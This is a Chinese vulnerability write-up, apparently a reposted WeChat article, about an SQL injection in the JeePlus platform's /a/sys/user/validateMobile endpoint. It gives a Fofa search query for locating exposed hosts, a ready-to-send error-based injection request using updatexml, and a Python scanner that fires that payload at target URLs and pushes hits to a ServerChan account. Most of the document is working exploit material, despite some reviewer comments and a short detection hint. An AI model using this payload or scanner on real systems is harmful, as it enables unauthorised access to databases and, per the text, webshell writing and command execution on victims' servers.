漏洞描述
JeePlus快速开发平台 validateMobile SQL注入,黑客可以利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。
漏洞复现
Fofa
app="JeePlus"
部分界面如下
复现过程如下
GET /a/sys/user/validateMobile?&mobile=1%27+and+1%3D%28updatexml%281%2Cconcat%280x7e%2C%28select+user%28%29%29%2C0x7e%29%2C1%29%29+and+%271%27%3D%271 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
红岸脚本
核心代码
# JeePlus_validateMobile_SQL_scan.py
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from requests.exceptions import Timeout
import os
import urllib.parse
import urllib.request
import re
import time
import ssl
import urllib
from urllib.parse import urljoin, quote
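def sc_send(text, desp='', key='[SENDKEY]', timeout=10):
    """Push a notification through the ServerChan (sctapi.ftqq.com) API.

    Args:
        text: Notification title.
        desp: Optional message body.
        key: ServerChan SendKey. It is embedded in the request path, so it
            belongs in configuration/environment, not in source or logs.
        timeout: Seconds to wait for the HTTP round trip before giving up.

    Returns:
        The response body decoded as UTF-8 (the API's reply text, unparsed).

    Raises:
        urllib.error.URLError / HTTPError on network or HTTP failure; a
        stalled connection surfaces as a timeout exception once *timeout*
        elapses.
    """
    # The key is a path segment; quote it so a malformed key cannot change
    # the request target. A plain alphanumeric key is left untouched.
    endpoint = f'https://sctapi.ftqq.com/{urllib.parse.quote(key, safe="")}.send'
    payload = urllib.parse.urlencode({'text': text, 'desp': desp}).encode('utf-8')
    request = urllib.request.Request(endpoint, data=payload, method='POST')
    # The original call had no timeout and could block the scan indefinitely.
    with urllib.request.urlopen(request, timeout=timeout) as response:
        return response.read().decode('utf-8')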
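# ServerChan SendKey used by sc_send(). It is read from the environment
# instead of being hard-coded: the key authorises pushes to the owner's
# account and must not live in the script. "[SENDKEY]" is the same
# placeholder sc_send() uses as its default. (SC_SENDKEY is the variable
# name chosen here; set it before running.)
key = os.environ.get("SC_SENDKEY", "[SENDKEY]")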
def scan_JeePlus_validateMobile_SQL(url, proxies, headers, append_to_output):
    """Send one probe to /a/sys/user/validateMobile and report the outcome.

    The probe is the error-based payload shown in the write-up above; the
    only positive indicator this function uses is an HTTP 500 whose body
    contains the substring 'XPATH'. Results go to append_to_output(message,
    colour) and, on a hit, to sc_send() using the module-level ``key``.

    Args:
        url: Target base URL; 'http://' is prepended when no scheme is given.
        proxies: Ignored — overwritten below (see NOTE(review)).
        headers: Ignored — overwritten below (see NOTE(review)).
        append_to_output: Callable(message: str, colour: str) used for output.

    Returns:
        None. All outcomes, including exceptions, are reported via
        append_to_output.

    Detection note for defenders: the request is a GET with the literal
    ``updatexml(`` / ``concat(0x7e`` sequence (URL-encoded) in the ``mobile``
    query parameter, followed by a 500 response. Either side of that
    exchange is a usable WAF/IDS signature for this probe.
    """
    # Avoid a doubled slash when the caller already supplied a trailing '/'.
    if url.endswith("/"):
        path = "a/sys/user/validateMobile?&mobile=1%27+and+1%3D%28updatexml%281%2Cconcat%280x7e%2C%28select+user%28%29%29%2C0x7e%29%2C1%29%29+and+%271%27%3D%271"
    else:
        path = "/a/sys/user/validateMobile?&mobile=1%27+and+1%3D%28updatexml%281%2Cconcat%280x7e%2C%28select+user%28%29%29%2C0x7e%29%2C1%29%29+and+%271%27%3D%271"
    if not url.startswith('http://') and not url.startswith('https://'):
        url = 'http://' + url
    # NOTE(review): the caller's ``proxies`` argument is discarded here and
    # every request is forced through 127.0.0.1:8080. If nothing is listening
    # there, requests.get() raises and the URL is reported under the generic
    # exception branch below, not as "not vulnerable".
    proxies = {
        'http': 'http://127.0.0.1:8080',
        'https': 'http://127.0.0.1:8080'
    }
    # NOTE(review): likewise the caller's ``headers`` argument is discarded.
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15',
        'Accept-Encoding': 'gzip',
    }
    encodetext = url + path
    try:
        # verify=False disables TLS certificate validation for this request;
        # the warning suppression only hides the resulting urllib3 warning.
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        req = requests.get(encodetext, headers=headers, verify=False, timeout=10, proxies=proxies)
        # Positive indicator: server error plus an XPATH error string in the
        # body. Any other status/body combination is treated as negative.
        if req.status_code == 500 and 'XPATH' in req.text:
            append_to_output(f"[+] {url} 存在JeePlus快速开发平台 validateMobile SQL注入!!!!", "red")
            # NOTE(review): the literal 'rn' in the message is presumably a
            # mangled '\r\n' line break; the sc_send() return value is unused.
            ret = sc_send('JeePlus快速开发平台 validateMobile SQL注入', f"漏洞连接: {url}rn漏洞类型: SQL注入", key)
        else:
            append_to_output(f"[-] {url} 不存在JeePlus快速开发平台 validateMobile SQL注入", "green")
    except Timeout:
        append_to_output(f"[!] 请求超时,跳过URL: {url}", "yellow")
    except Exception as e:
        # Connection/certificate failures are reported as a yellow "skipped"
        # line; matching is by substring of the exception text, so other
        # errors that happen to contain these strings land here too.
        if 'HTTPSConnectionPool' in str(e) or 'Burp Suite Professional' in str(e):
            append_to_output(f"[-] {url} 证书校验错误或者证书被拒绝", "yellow")
        else:
            append_to_output(str(e), "yellow")
原文始发于微信公众号(暗影网安实验室):JeePlus快速开发平台 validateMobile SQL注入